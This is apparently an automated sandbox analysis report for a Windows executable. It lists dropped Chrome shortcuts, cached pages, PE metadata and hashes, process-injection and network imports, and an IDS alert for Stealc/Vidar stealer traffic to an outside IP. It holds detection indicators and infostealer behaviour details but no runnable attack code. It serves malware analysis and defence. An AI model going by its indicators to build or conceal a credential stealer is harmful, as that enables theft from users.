SHA1:	32AE78D4E1C7D36FC1D81E07F7504BDFC05C2538
SHA-256:	FE6039C1CAEEF22DCDE0EA0A53B73452271E1068DD356BB77663AAEAF456FC6B
SHA-512:	0054B701CB6CE0F6EBE9CFAF35A4680AAAD604C4FB0B4955B0A57E9687F79A2E74B30AF7918D0765F41DD8F2C5EE77B27F64709A6CB134C761342725791458CC
Malicious:	false
Preview:	L..................F.@.. ...$+.,.....Hh.%?..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IyY5T....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VyY5T....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VyY5T....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VyY5T..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VyY6T...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............?L.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Nov 25 09:33:43 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2681
Entropy (8bit):	3.9776159776707294
Encrypted:	false
SSDEEP:	48:8rdqCoTKCs+pHGidAKZdA1hehBiZUk1W1qeh/y+C:8QvP9fy
MD5:	F58F620E5C782B274ACA6C18C45F3A32
SHA1:	C4ACB7F99DC3679DFCECC64B764C3DEFF4CF6DDC
SHA-256:	88971BB52F2D5E1E185F0463D61BA11CB08909E818A82F80D1A58AC0679DB0FF
SHA-512:	2303A963F57209F4FE67785855BB6C1528B1653BA09406B57CC47FD5015A72A05A0B29D1E94D50FBBB8CF91D8FE57E46ACD3A89D478FAE1016B3B7D8ACF89E2E
Malicious:	false
Preview:	L..................F.@.. ...$+.,....B.q.%?..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IyY5T....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VyY5T....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VyY5T....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VyY5T..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VyY6T...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............?L.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Nov 25 09:33:43 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2683
Entropy (8bit):	3.982869610013592
Encrypted:	false
SSDEEP:	48:8udqCoTKCs+pHGidAKZdA1duT+ehOuTbbiZUk5OjqehOuTbFy+yT+:8XvHT/TbxWOvTbFy7T
MD5:	6F63498139A220FF14771F489F74439F
SHA1:	A2D18E48EABD2F80D3BC5951842E586EFFB2139D
SHA-256:	AB82BA25A7DC9B29DED47105CDBC7A12D96F46604C7E7646181F99BB4C707BC2
SHA-512:	278EF9E1EDF8FD84626997F3F6362D7F85D42637F4313CC83782BCB166EE4F682E50E12FC3E06ED1D3C530D16139E2942E21520AA6E359A2F172F2BC7F2EA5B0
Malicious:	false
Preview:	L..................F.@.. ...$+.,....."a.%?..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IyY5T....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VyY5T....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VyY5T....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VyY5T..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VyY6T...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............?L.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

Chrome Cache Entry: 449

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (4801)
Category:	downloaded
Size (bytes):	4806
Entropy (8bit):	5.8414456692293495
Encrypted:	false
SSDEEP:	96:NliP66mLzu0vLQ8nAnYnPfobQrIDD/cWkSfKN8nExGfffffo:LoLm3u6tAnYnLrIDD0L18nExV
MD5:	28471E30AF048F8B91364D6B7DDD6224
SHA1:	B41F3A08251566C3F01196FFBFC838CFD6748C67
SHA-256:	7EE77EA14AAF38EEA9BADEBCDC6389D9A42F19EE0785E24CADDFC2CEC9B1CB6C
SHA-512:	830C0698DB704D38003480EF41C5FB0D58F599D4150727C609FFE2DC3654407D27CD7658877A0F8A1AF8B9CF403D6606326BA5BF95E78405F849B0AAE2C7260F
Malicious:	false
URL:	https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
Preview:	)]}'.["",["buffalo bills","product recall","wicked movie box office","the earth tilted 31.5 inches","hyundai recalls","ap college football rankings","best 2024 christmas movies","nintendo switch oled black friday deals"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"google:entityinfo":"CggvbS8wMWNfZBINRm9vdGJhbGwgdGVhbTLSFmRhdGE6aW1hZ2UvcG5nO2Jhc2U2NCxpVkJPUncwS0dnb0FBQUFOU1VoRVVnQUFBRUFBQUFBOUNBTUFBQUFxQzUvekFBQUJqRkJNVkVYLy8vLy9BQUFGUGEwQU9xN1QwOU1BTmEzZDNkM0h4OGZXMXRiNit2b0FONjNoNGVIeDhmSHM3T3prNU9UTXpNd0FLcWpBd01Edy8vL3hBQUFBTDZzQUFKbmU1T0xuMWRXUlZXUDFHaHRDV0ovc0p5Z0FLS3Z5M2R2cTZlVUFES2J0NE4vQXRjbmdQbFhoOC83Z2U0di8vL2doUXBrOVZhRzN2OSsranJERXhzK0lrYlpaYTZqV3hNcTVuN1RnM09xc2phWFd5TmZpNXZLWHF0b21WN20wbEtaaWY4ZE1iOEhXNHZSempjMnRuTHB6WWFxaE8zeW1LM0RYWUhuL3FxV0hUSlR6ZklMLzA4L0VxTFdUTUgydksyci9qWWlCbTlQRTB1eWh0dUN4cWJEa3lNZkh0Y0dXZUg2a1kydW5scG1SWkcyNW5KemVYMkRBZFhXaW83Y

Chrome Cache Entry: 450

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (2586)
Category:	downloaded
Size (bytes):	175021
Entropy (8bit):	5.5519862292821776
Encrypted:	false
SSDEEP:	3072:kEBR0Kx4gWiUIzT2Zu2AuhZNsWGUHUylZBTftnn2N2DIWHUm1CBT46mG3bXnejYR:kKR0oWiUIzy42AuXNsWGUHLlZBTftn2b
MD5:	6ECBEC06F6245882E6D9659E66022263
SHA1:	F86FC301A3851511557DF798AD2BAD2AA4659946
SHA-256:	F7885470D82B8357E5AD03205AC0885DD9FD6F965E550D746627E5E35D4CF66B
SHA-512:	F2EDD978C9DC289B82DC0956503659B92C3B621DD1001DB2C5C34ACA01FFCDE7F84A6B24ED0B30A1EA6B15D937B6DD93FAE1DB97DCE26E9F9FCE1A3F5C43A8DD
Malicious:	false
URL:	"https://www.gstatic.com/og/_/js/k=og.qtm.en_US._3uvDuX1Bhg.2019.O/rt=j/m=q_dnp,qmd,qcwid,qapid,qald,qads,q_dg/exm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/rs=AA2YrTus2ZfPv70D5bJuGT4XDgi-VtNqjg"
Preview:	this.gbar_=this.gbar_\|\|{};(function(_){var window=this;.try{._.Yi=function(a){if(4&a)return 4096&a?4096:8192&a?8192:0};_.Zi=class extends _.Q{constructor(){super()}};.}catch(e){_._DumpException(e)}.try{.var $i,aj,ej,hj,gj,cj,fj;$i=function(a){try{return a.toString().indexOf("[native code]")!==-1?a:null}catch(b){return null}};aj=function(){_.Na()};ej=function(a,b){(_.bj\|\|(_.bj=new cj)).set(a,b);(_.dj\|\|(_.dj=new cj)).set(b,a)};hj=function(a){if(fj===void 0){const b=new gj([],{});fj=Array.prototype.concat.call([],b).length===1}fj&&typeof Symbol==="function"&&Symbol.isConcatSpreadable&&(a[Symbol.isConcatSpreadable]=!0)};_.ij=function(a,b,c){a=_.tb(a,b,c);return Array.isArray(a)?a:_.Fc};._.jj=function(a,b){a=(2&b?a\|2:a&-3)\|32;return a&=-2049};_.kj=function(a,b){a===0&&(a=_.jj(a,b));return a\|1};_.lj=function(a){return!!(2&a)&&!!(4&a)\|\|!!(2048&a)};_.mj=function(a,b,c){32&b&&c\|\|(a&=-33);return a};._.pj=function(a,b,c,d,e,f,g){a=a.ha;var h=!!(2&b);e=h?1:e;f=!!f;g&&(g=!h);h=_.ij(a,b,d);var k=h[_

Chrome Cache Entry: 451

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	29
Entropy (8bit):	3.9353986674667634
Encrypted:	false
SSDEEP:	3:VQAOx/1n:VQAOd1n
MD5:	6FED308183D5DFC421602548615204AF
SHA1:	0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
SHA-256:	4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
SHA-512:	A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
Malicious:	false
URL:	https://www.google.com/async/newtab_promos
Preview:	)]}'.{"update":{"promos":{}}}

Chrome Cache Entry: 452

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65531)
Category:	downloaded
Size (bytes):	132979
Entropy (8bit):	5.43539701223399
Encrypted:	false
SSDEEP:	3072:fVkXyPqO7UX1Hme9kZbs4Voc5gSnXqwQ2i6o:f+yWFHrp4Voc5gSnawQ8o
MD5:	F82E94A11DCDEDE46873273764EA332A
SHA1:	7141B376CDCEE4B676D8B5EDEE97801000B5DE87
SHA-256:	D74A09CB9FF1A776DFE2205BF79B8FC94E1C33B93B556C70B00B505AD9ADFF51
SHA-512:	22076FD2A4068B467F3C4489CEA98D6323B5A623D089B580801C6A2C9602E15F45611FAA02F9709F7429C08EAE4AEDBDF3F1FF5519D325EBFAE99CC775C6FF3B
Malicious:	false
URL:	https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
Preview:	)]}'.{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\u003cdiv class\u003d\"gb_Pd\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_kd gb_od gb_Fd gb_ld\"\u003e\u003cdiv class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Jc gb_Mc gb_Q\" aria-label\u003d\"Go back\" title\u003d\"Go back\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.

Chrome Cache Entry: 453

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (5162), with no line terminators
Category:	downloaded
Size (bytes):	5162
Entropy (8bit):	5.3503139230837595
Encrypted:	false
SSDEEP:	96:lXTMb1db1hNY/cobkcsidqg3gcIOnAg8IF8uM8DvY:lXT0TGKiqggdaAg8IF8uM8DA
MD5:	7977D5A9F0D7D67DE08DECF635B4B519
SHA1:	4A66E5FC1143241897F407CEB5C08C36767726C1
SHA-256:	FE8B69B644EDDE569DD7D7BC194434C57BCDF60280078E9F96EEAA5489C01F9D
SHA-512:	8547AE6ACA1A9D74A70BF27E048AD4B26B2DC74525F8B70D631DA3940232227B596D56AB9807E2DCE96B0F5984E7993F480A35449F66EEFCF791A7428C5D0567
Malicious:	false
URL:	"https://www.gstatic.com/og/_/ss/k=og.qtm.zyyRgCCaN80.L.W.O/m=qmd,qcwid/excm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/ct=zgms/rs=AA2YrTs4SLbgh5FvGZPW_Ny7TyTdXfy6xA"
Preview:	.gb_P{-webkit-border-radius:50%;border-radius:50%;bottom:2px;height:18px;position:absolute;right:0;width:18px}.gb_Ja{-webkit-border-radius:50%;border-radius:50%;-webkit-box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);margin:2px}.gb_Ka{fill:#f9ab00}.gb_F .gb_Ka{fill:#fdd663}.gb_La>.gb_Ka{fill:#d93025}.gb_F .gb_La>.gb_Ka{fill:#f28b82}.gb_La>.gb_Ma{fill:white}.gb_Ma,.gb_F .gb_La>.gb_Ma{fill:#202124}.gb_Na{-webkit-clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 31.3282C19.1443 31.7653 17.5996 32 16 32C7.16344 32 0 24.8366 0 16C0 7.16344 7.16344 0 16 0Z");clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 3

Chrome Cache Entry: 454

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	SVG Scalable Vector Graphics image
Category:	downloaded
Size (bytes):	1660
Entropy (8bit):	4.301517070642596
Encrypted:	false
SSDEEP:	48:A/S9VU5IDhYYmMqPLmumtrYW2DyZ/jTq9J:A2VUSDhYYmM5trYFw/jmD
MD5:	554640F465EB3ED903B543DAE0A1BCAC
SHA1:	E0E6E2C8939008217EB76A3B3282CA75F3DC401A
SHA-256:	99BF4AA403643A6D41C028E5DB29C79C17CBC815B3E10CD5C6B8F90567A03E52
SHA-512:	462198E2B69F72F1DC9743D0EA5EED7974A035F24600AA1C2DE0211D978FF0795370560CBF274CCC82C8AC97DC3706C753168D4B90B0B81AE84CC922C055CFF0
Malicious:	false
URL:	https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_clr_74x24px.svg
Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="74" height="24" viewBox="0 0 74 24"><path fill="#4285F4" d="M9.24 8.19v2.46h5.88c-.18 1.38-.64 2.39-1.34 3.1-.86.86-2.2 1.8-4.54 1.8-3.62 0-6.45-2.92-6.45-6.54s2.83-6.54 6.45-6.54c1.95 0 3.38.77 4.43 1.76L15.4 2.5C13.94 1.08 11.98 0 9.24 0 4.28 0 .11 4.04.11 9s4.17 9 9.13 9c2.68 0 4.7-.88 6.28-2.52 1.62-1.62 2.13-3.91 2.13-5.75 0-.57-.04-1.1-.13-1.54H9.24z"/><path fill="#EA4335" d="M25 6.19c-3.21 0-5.83 2.44-5.83 5.81 0 3.34 2.62 5.81 5.83 5.81s5.83-2.46 5.83-5.81c0-3.37-2.62-5.81-5.83-5.81zm0 9.33c-1.76 0-3.28-1.45-3.28-3.52 0-2.09 1.52-3.52 3.28-3.52s3.28 1.43 3.28 3.52c0 2.07-1.52 3.52-3.28 3.52z"/><path fill="#4285F4" d="M53.58 7.49h-.09c-.57-.68-1.67-1.3-3.06-1.3C47.53 6.19 45 8.72 45 12c0 3.26 2.53 5.81 5.43 5.81 1.39 0 2.49-.62 3.06-1.32h.09v.81c0 2.22-1.19 3.41-3.1 3.41-1.56 0-2.53-1.12-2.93-2.07l-2.22.92c.64 1.54 2.33 3.43 5.15 3.43 2.99 0 5.52-1.76 5.52-6.05V6.49h-2.42v1zm-2.93 8.03c-1.76 0-3.1-1.5-3.1-3.52 0-2.05 1.34-3.52 3.1-3

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.61024815338349
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	281'600 bytes
MD5:	df96c3d0bb84474f4ed6c4206d1bacea
SHA1:	3e846e3a979cfad2df3eadc821fccf48f2cda4fd
SHA256:	dab9fee612125503146e28407ec8631232d6b48d567c902b6743bf2e984048b8
SHA512:	17ab06107bfcbbd4cc5503996d544d5d48e6ae4f49f76be841455885b77e5c7a5128ab74903a1825dd3a809aed12b414f7dc97c2ae7f5750ad67abba22bd1055
SSDEEP:	6144:rh0ZpFC4sffny7TuLBdZlT4DIJYdy3i8ioyrN:rh0ZpFCfB3TGyYy35iBZ
TLSH:	FF548D1163607C3BF2225474B70D97768A6B3C342A529F0BFBD50675AFF42E2AA1071B
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......$...`...`...`.....c.x.....V.p.....b._...i.K.e...i.[.t.......c...`.........g.p.....U.a...Rich`...................PE..L....MDg...

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x419c8d
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NO_ISOLATION, TERMINAL_SERVER_AWARE
Time Stamp:	0x67444DE4 [Mon Nov 25 10:13:56 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	0b8c3b7f5974cb002243977711d52689

Entrypoint Preview

Instruction
je 00007FC855191795h
jne 00007FC855191793h
mov eax, FE8EC1E8h
push dword ptr [ebx+eax+75h]
add dword ptr [eax+000184E8h], edi
add byte ptr [ebx+eax+75h], dh
add dword ptr [eax-018BCA18h], edi
push dword ptr [ebx+eax+75h]
add dword ptr [eax-018A4018h], edi
push dword ptr [ebx+eax+75h]
add dword ptr [eax-018A4A18h], edi
push dword ptr [ebx+eax+75h]
add dword ptr [eax-018A5418h], edi
push dword ptr [ebx+eax+75h]
add dword ptr [eax-01885818h], edi
push dword ptr [ebx+eax+75h]
add dword ptr [eax-018A6818h], edi
push dword ptr [ebx+eax+75h]
add dword ptr [eax-018A7218h], edi
push dword ptr [ebx+eax+75h]
add dword ptr [eax-018A7C18h], edi
push dword ptr [ebx+eax+75h]
add dword ptr [eax-01886818h], edi
push dword ptr [ebx+eax+75h]
add dword ptr [eax-018A9018h], edi
push dword ptr [ebx+eax+75h]
add dword ptr [eax-018A9A18h], edi
push dword ptr [ebx+eax+75h]
add dword ptr [eax-018AA418h], edi
push dword ptr [ebx+eax+75h]
add dword ptr [eax-01883918h], edi
push dword ptr [ebx+eax+75h]
add dword ptr [eax-018AB818h], edi
push dword ptr [ebx+eax+75h]
add dword ptr [eax-018AC218h], edi
push dword ptr [ebx+eax+75h]
add dword ptr [eax-018ACC18h], edi
jmp far eax
adc byte ptr [ecx-02h], bh
push dword ptr [ebx+eax+75h]
add dword ptr [eax-018ADB18h], edi
push dword ptr [ebx+eax+75h]
add dword ptr [eax+00000000h], edi

Rich Headers

Programming Language:

[C++] VS2010 build 30319
[ASM] VS2010 build 30319
[ C ] VS2010 build 30319
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[LNK] VS2010 build 30319

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3d008	0xf0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x253000	0xb0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x254000	0x33c0	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x31000	0x2fc	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x2fc12	0x2fe00	490359d2039bed1fe9201133edd5b2c6	False	0.5156351990861618	data	6.45972522155846	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x31000	0xcfdc	0xd000	554bc2adcd608a8f6dc42c0a7df14162	False	0.6000600961538461	data	6.3543490154801345	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x3e000	0x214e8c	0x2e00	bc8ce1400528fb4eab6391619c257014	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x253000	0xb0	0x200	0bcee7bb60016f2b43c07f17c9314bb7	False	0.279296875	data	4.106523643281409	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x254000	0x4926	0x4a00	4745d41da41e74179f7cadb66ce2568b	False	0.5707875844594594	data	5.533816308624364	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x253058	0x56	ASCII text, with CRLF line terminators	English	United States	1.0232558139534884

Imports

DLL	Import
msvcrt.dll	_mbscmp, _splitpath, memmove, strstr, strncpy, malloc, _wtoi64, ??_V@YAXPAX@Z, atexit, strcpy_s, memchr, strchr, strtok_s, ??_U@YAPAXI@Z, _time64, srand, rand, _ismbcupper, __CxxFrameHandler3
KERNEL32.dll	GetEnvironmentStringsW, FreeEnvironmentStringsW, GetModuleFileNameA, HeapSize, WideCharToMultiByte, IsValidCodePage, GetOEMCP, GetACP, GetCPInfo, HeapSetInformation, GetCommandLineA, ExitProcess, SetCriticalSectionSpinCount, FlsAlloc, HeapAlloc, GetCurrentProcess, HeapFree, VirtualFree, GetProcessHeap, WriteFile, VirtualAllocExNuma, Sleep, ReadFile, CreateFileW, lstrcatA, MultiByteToWideChar, GetTempPathW, GetLastError, lstrcmpiA, GetProcAddress, VirtualAlloc, GlobalMemoryStatusEx, ConvertDefaultLocale, lstrcmpiW, GetModuleHandleA, VirtualProtect, CloseHandle, lstrlenA, CreateFileA, GetFileSize, FreeLibrary, GetThreadContext, SetThreadContext, SetHandleCount, VirtualAllocEx, WriteProcessMemory, VirtualQueryEx, OpenProcess, GetComputerNameA, FileTimeToSystemTime, WaitForSingleObject, GetDriveTypeA, CreateProcessA, CreateDirectoryA, FindFirstFileA, GetLogicalDriveStringsA, FindClose, FindNextFileA, CreateThread, SetFilePointer, MapViewOfFile, UnmapViewOfFile, lstrcpynA, SystemTimeToFileTime, GetTickCount, GetLocalTime, CreateFileMappingA, GetFileInformationByHandle, lstrcpyA, TlsGetValue, TlsAlloc, GetModuleFileNameW, GetStdHandle, GetModuleHandleW, HeapDestroy, HeapCreate, RtlUnwind, EnterCriticalSection, FatalAppExitA, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, DecodePointer, EncodePointer, IsDebuggerPresent, SetUnhandledExceptionFilter, HeapReAlloc, GetFileType, QueryPerformanceCounter, GetStartupInfoW, GetCurrentProcessId, GetSystemTimeAsFileTime, LCMapStringW, ReadProcessMemory, GetStringTypeW, UnhandledExceptionFilter, TerminateProcess, TlsFree, RaiseException, IsValidLocale, EnumSystemLocalesA, GetLocaleInfoA, GetUserDefaultLCID, InterlockedIncrement, SetLastError, GetCurrentThreadId, InterlockedDecrement, GetCurrentThread, IsProcessorFeaturePresent, SetConsoleCtrlHandler, InterlockedExchange, GetLocaleInfoW, LoadLibraryW, TlsSetValue
USER32.dll	wsprintfA, GetDesktopWindow, OpenDesktopA, CreateDesktopA, CloseDesktop, OpenInputDesktop, wsprintfW, IsDialogMessageW, MessageBoxA, GetWindowLongW, ReleaseDC, GetWindowContextHelpId, GetCursorPos, SetThreadDesktop, RegisterClassW, IsWindowVisible, CharToOemA
GDI32.dll	CreateDCA, GetDeviceCaps
ADVAPI32.dll	RegGetValueA, RegOpenKeyExA, GetUserNameA, GetCurrentHwProfileA
SHELL32.dll	SHFileOperationA, SHGetFolderPathA
ole32.dll	CoInitializeSecurity, CoSetProxyBlanket, CoCreateInstance, CoInitializeEx
OLEAUT32.dll	VariantClear, SysFreeString, VariantInit, SysAllocString
PSAPI.DLL	GetModuleBaseNameA, EnumProcessModules
WS2_32.dll	connect, WSAStartup, getaddrinfo, htons, WSACleanup, recv, socket, freeaddrinfo, closesocket, send
SHLWAPI.dll	PathFileExistsA

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-25T11:33:27.986975+0100	2049087	ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST	1	192.168.2.5	49734	49.13.32.95	443	TCP
